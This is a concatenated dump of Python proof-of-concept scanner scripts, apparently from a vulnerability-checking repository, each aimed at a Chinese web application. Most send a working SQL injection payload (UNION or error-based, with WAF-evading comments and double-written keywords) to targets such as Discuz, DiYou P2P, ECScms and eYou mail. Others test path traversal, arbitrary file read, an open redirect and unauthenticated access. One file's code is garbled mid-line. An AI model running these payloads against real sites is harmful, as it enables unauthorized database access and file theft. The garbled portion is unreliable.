2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PKPMBS工程质量监督站信息管理系统SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0154499
6 | author: Lucifer
7 | description: PKPMBS guestbook.aspx文件中参数id存在SQL注入漏洞
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class pkpmbs_guestbook_sqli_BaseVerify:
    """Check one site for the PKPMBS ``guestbook.aspx`` SQL injection (``id`` parameter).

    The probe appends a UNION SELECT to ``id`` whose last column is the MD5 of
    the constant ``1234``; a finding is printed only when that digest appears
    in the response body.

    NOTE(review): on the defending side, ``union all select`` together with
    ``hashbytes`` in the ``id`` parameter of ``guestbook.aspx`` is a clear log
    and WAF signal for this probe.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the single GET probe and print a finding if the marker is echoed."""
        probe_path = "/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
        # Hex MD5 of "1234", the value the injected column computes.
        marker = "81dc9bdb52d04dc20036dbd8313ed055"
        vulnurl = self.url + probe_path
        try:
            # verify=False disables TLS certificate validation, so the host
            # that answers is not authenticated.
            response = requests.get(vulnurl, timeout=10, verify=False)
            if marker in response.text:
                cprint("[+]存在PKPMBS SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except: every failure is printed as "connection timed out",
            # whatever its real cause.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
29 |
if __name__ == "__main__":
    # Standalone use: the only command-line argument is the base URL to check.
    # filterwarnings("ignore") hides every warning category, including the
    # notice about unverified HTTPS requests caused by verify=False.
    warnings.filterwarnings("ignore")
    pkpmbs_guestbook_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/acsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/acsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/autoset/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/autoset/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/cmseasy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/cmseasy/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/dedecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/dedecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/dedecms/dedecms_download_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms download.php重定向漏洞
5 | referer: http://skyhome.cn/dedecms/357.html
6 | author: Lucifer
7 | description: 在dedecms 5.7sp1的/plus/download.php中67行存在的代码,即接收参数后未进行域名的判断就进行了跳转。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class dedecms_download_redirect_BaseVerify:
    """Check one site for the dedecms ``/plus/download.php`` open redirect.

    The ``link`` parameter carries a base64-encoded URL
    (``https://www.baidu.com``). The site is reported when that host name
    appears in the body that comes back.

    NOTE(review): the file header describes the cause as a redirect performed
    without checking the target domain; the corresponding fix is to validate
    the decoded ``link`` host against an allow-list before redirecting.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Request the redirect probe and print a finding if the target host shows up."""
        probe_path = "/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuYmFpZHUuY29t"
        browser_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        vulnurl = self.url + probe_path
        try:
            # requests follows redirects by default, so the body inspected
            # below is whatever the final URL returned. verify=False disables
            # TLS certificate validation for the whole chain.
            response = requests.get(vulnurl, headers=browser_headers, timeout=10, verify=False)
            if "www.baidu.com" in response.text:
                cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: " + vulnurl, "blue")
        except:
            # Bare except: every failure is printed as "connection timed out",
            # whatever its real cause.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: the only command-line argument is the base URL to check.
    # filterwarnings("ignore") hides every warning category, including the
    # notice about unverified HTTPS requests caused by verify=False.
    warnings.filterwarnings("ignore")
    dedecms_download_redirect_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/dedecms/dedecms_error_trace_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms trace爆路径漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: 访问mysql_error_trace.inc,mysql trace报错路径泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_error_trace_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/data/mysql_error_trace.inc"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: the only command-line argument is the base URL to check.
    # filterwarnings("ignore") hides every warning category, including the
    # notice about unverified HTTPS requests caused by verify=False.
    warnings.filterwarnings("ignore")
    dedecms_error_trace_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/digital_campus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/digital_campus/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/discuz/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/discuz/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/discuz/discuz_focus_flashxss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz X3 focus.swf flashxss漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件中focus.swf存在flashxss。
8 | '''
9 | import sys
10 | import urllib
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
class discuz_focus_flashxss_BaseVerify:
    """Check whether a Discuz site serves the ``focus.swf`` build flagged for Flash XSS.

    Nothing is injected: the file at ``/static/image/common/focus.swf`` is
    downloaded and its MD5 is compared with one known digest. Site owners can
    run the same hash comparison against their own copy of the file.
    """

    def __init__(self, url):
        # Base URL of the site to check; the file path is appended verbatim.
        self.url = url

    def run(self):
        """Download focus.swf and print a finding when its MD5 equals the known digest."""
        known_digest = "c16a7c6143f098472e52dd13de85527f"
        vulnurl = self.url + "/static/image/common/focus.swf"
        try:
            # NOTE(review): the file imports only ``urllib``, so
            # ``urllib.request`` resolves only if some other import has already
            # loaded it; the call also sets no timeout and sends no custom
            # headers. All of that is kept as it was.
            swf_bytes = urllib.request.urlopen(vulnurl).read()
            # Both values are 32-character hex strings, so equality is the
            # same test as the substring check it replaces.
            if hashlib.md5(swf_bytes).hexdigest() == known_digest:
                cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except: every failure (including an HTTP 404 for the file)
            # is printed as "connection timed out".
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
36 |
if __name__ == "__main__":
    # Standalone use: the only command-line argument is the base URL to check.
    # filterwarnings("ignore") hides every warning category for this process.
    warnings.filterwarnings("ignore")
    discuz_focus_flashxss_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/discuz/discuz_plugin_ques_sqli.py:
--------------------------------------------------------------------------------
1 |
2 | #!/usr/bin/env python
3 | # -*- coding: utf-8 -*-
4 | '''
5 | name: discuz问卷调查参数orderby注入漏洞
6 | referer: http://0day5.com/archives/3184/
7 | author: Lucifer
8 | description: 文件plugin.php中,参数orderby存在SQL注入。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
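class discuz_plugin_ques_sqli_BaseVerify:
    """Probe the `orderby` parameter of plugin.php for error-based SQL injection.

    A single GET request asks the database to compute MD5(1234) inside an
    error message; the check reports a hit when that digest shows up in the
    response body. A miss does not prove the parameter is safe.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when the digest marker is reflected."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The marker is the MD5 of "1234" without its last character;
            # presumably the database error text truncates the value - confirm.
            if "81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")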
32 |
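if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = discuz_plugin_ques_sqli_BaseVerify(sys.argv[1])
    testVuln.run()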
--------------------------------------------------------------------------------
/pocs/cms/diyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/diyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/diyou/dyp2p_latesindex_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 帝友P2P借贷系统无需登录SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2011-150130
6 | author: Lucifer
7 | description: 帝友P2P借贷系统/lates/index.html逾期黑名单搜索处过滤了select和空格,利用/**/和双写select可以绕过
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
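class dyp2p_latesindex_sqli_BaseVerify:
    """Probe the `username` parameter of /lates/index.html for SQL injection.

    The request asks the database to compute MD5('1234'); the check reports
    a hit when the full digest appears in the response body. A miss does not
    prove the parameter is safe.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when the digest marker is reflected."""
        payload = "/lates/index.html?username=123%27/**/and/**/(seleselectct/**/1/**/from/**/(selselectect/**/count(*),concat(0x7e,MD5(%271234%27),0x7e,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # Full MD5 of "1234"; it can only appear if the server evaluated
            # the injected expression or echoed the digest from elsewhere.
            if "81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在帝友P2P借贷系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")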
29 |
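if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = dyp2p_latesindex_sqli_BaseVerify(sys.argv[1])
    testVuln.run()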
--------------------------------------------------------------------------------
/pocs/cms/diyou/dyp2p_url_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 帝友P2P借贷系统任意文件读取漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-033114
6 | author: Lucifer
7 | description: 帝友P2P3.0以前存在任意文件读取漏洞,可读取数据库配置文件
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
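class dyp2p_url_fileread_BaseVerify:
    """Probe the `imgurl` plugin endpoint for an arbitrary file read.

    The `url` parameter carries a base64-encoded file reference; the check
    reports a hit when the string "common.inc.php" appears in the response.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when the file-name marker is present."""
        payload = "/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA=="
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # NOTE(review): the marker is only a file name; an error page that
            # echoes the requested path would match too, so confirm a hit
            # against the actual response body.
            if "common.inc.php" in req.text:
                cprint("[+]存在帝友P2P借贷系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")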
29 |
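if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = dyp2p_url_fileread_BaseVerify(sys.argv[1])
    testVuln.run()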
--------------------------------------------------------------------------------
/pocs/cms/dreamgallery/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/dreamgallery/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/dreamgallery/dreamgallery_album_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dreamgallery album.php SQL注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件album.php中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
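class dreamgallery_album_id_sqli_BaseVerify:
    """Probe the `id` parameter of /dream/album.php for SQL injection.

    The request asks the database to return md5(1234) in a result column; the
    check reports a hit when the full digest appears in the response body.
    A miss does not prove the parameter is safe.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when the digest marker is reflected."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/dream/album.php?id=-1+/*!12345union*/+/*!12345select*/+1,group_concat(version(),0x3a,md5(1234),0x3a,database()),3,4,5,6,7,8,9,10--+"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Full MD5 of "1234". The probe also selects version() and
            # database(), so a positive response body contains both values.
            if "81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在dreamgallery album.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")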
31 |
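if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = dreamgallery_album_id_sqli_BaseVerify(sys.argv[1])
    testVuln.run()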
--------------------------------------------------------------------------------
/pocs/cms/dswjcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/dswjcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/ecscms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ecscms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/ecscms/ecscms_MoreIndex_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 易创思ECScms MoreIndex SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-088844
6 | author: Lucifer
7 | description: 文件MoreIndex.aspx中,参数kw存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
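class ecscms_MoreIndex_sqli_BaseVerify:
    """Probe the `kw` parameter of MoreIndex.aspx for SQL injection.

    The request asks the database to hash '1234' with MD5; the check reports
    a hit when the full digest appears in the response body. A miss does not
    prove the parameter is safe.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when the digest marker is reflected."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/MoreIndex.aspx?pkId=0&kw=a%27%20AnD%201=(SeLeCt%20Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27)))--&st=2&t=1"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): the comparison is case-sensitive; if the server
            # renders the hex digest in upper case this check misses it.
            if "81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在易创思ECScms MoreIndex SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")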
31 |
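if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = ecscms_MoreIndex_sqli_BaseVerify(sys.argv[1])
    testVuln.run()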
--------------------------------------------------------------------------------
/pocs/cms/ecshop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ecshop/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/esccms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/esccms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/esccms/esccms_selectunitmember_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 易创思教育建站系统未授权访问可查看所有注册用户
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-086704
6 | author: Lucifer
7 | description: 文件selectunitmember.aspx未授权访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
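class esccms_selectunitmember_unauth_BaseVerify:
    """Check whether selectunitmember.aspx is served without authentication.

    The page is requested with no session; the check reports a hit when the
    body contains both "doPostBack" and "gvUnitMember".
    """

    def __init__(self, url):
        # Base URL of the target; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Request the page anonymously and report when both markers appear."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/operationmanage/selectunitmember.aspx"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Both strings must be present; the status code is not checked.
            if "doPostBack" in req.text and "gvUnitMember" in req.text:
                cprint("[+]存在易创思教育建站系统未授权漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")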
31 |
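if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = esccms_selectunitmember_unauth_BaseVerify(sys.argv[1])
    testVuln.run()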
--------------------------------------------------------------------------------
/pocs/cms/etmdcp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/etmdcp/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/eyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/eyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/eyou/eyou_resetpw.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮邮件系统重置密码问题暴力破解
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0162892
6 | author: Lucifer
7 | description: 亿邮邮件系统找回密码处,如果用户设置问题密码过于简单可被暴力破解。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
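class eyou_resetpw_BaseVerify:
    """Check whether the eYou mail password-reset page is exposed.

    The check only establishes that /?q=resetpw answers 200 and contains
    "pw_intensity". It does not test any account or security question, so a
    hit is informational (printed in green).
    """

    def __init__(self, url):
        # Base URL of the target; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Request the reset page and report when it is reachable."""
        payload = "/?q=resetpw"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, timeout=10, verify=False)

            if req.status_code == 200 and "pw_intensity" in req.text:
                cprint("[+]存在eyou邮件系统重置密码问题页面...(敏感信息)\tpayload: "+vulnurl, "green")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")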
29 |
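if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = eyou_resetpw_BaseVerify(sys.argv[1])
    testVuln.run()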
--------------------------------------------------------------------------------
/pocs/cms/eyou/eyou_user_kw_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮mail5 user 参数kw SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-074260
6 | author: Lucifer
7 | description: 文件user中,参数kw存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
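class eyou_user_kw_sqli_BaseVerify:
    """Probe the `kw` parameter of the eYou /user/ help search for SQL injection.

    The request asks the database to return Md5(1234) in a result column; the
    check reports a hit when the full digest appears in the response body.
    A miss does not prove the parameter is safe.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when the digest marker is reflected."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/user/?q=help&type=search&page=1&kw=-1%22)UnIoN/**/AlL/**/SeLeCt/**/1,2,3,Md5(1234),5,6,7%23"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Full MD5 of "1234"; it can only appear if the server evaluated
            # the injected expression or echoed the digest from elsewhere.
            if "81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在亿邮mail5 user 参数kw SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")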
31 |
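if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = eyou_user_kw_sqli_BaseVerify(sys.argv[1])
    testVuln.run()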
--------------------------------------------------------------------------------
/pocs/cms/fastmeeting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/fastmeeting/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/fastmeeting/fastmeeting_download_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 好视通视频会议系统(fastmeeting)任意文件遍历
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0143719
6 | author: Lucifer
7 | description: 文件/dbbackup/adminMgr/download.jsp中,参数fileName存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
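class fastmeeting_download_filedownload_BaseVerify:
    """Probe download.jsp for a path traversal in the `fileName` parameter.

    The request asks for ../WEB-INF/web.xml; the check reports a hit when
    the response Content-Type is exactly "application/xml". The body is not
    inspected.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when an XML content type comes back."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() avoids a KeyError (previously reported as a timeout) when
            # the response has no Content-Type header.
            # NOTE(review): this is an exact match, so a header with a charset
            # parameter is missed, and any XML response counts as a hit
            # whatever it contains; confirm a hit by reading the body.
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在好视通视频会议系统(fastmeeting)任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")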
31 |
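if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = fastmeeting_download_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()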
--------------------------------------------------------------------------------
/pocs/cms/finecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/finecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/foosun/__init__.py:
--------------------------------------------------------------------------------
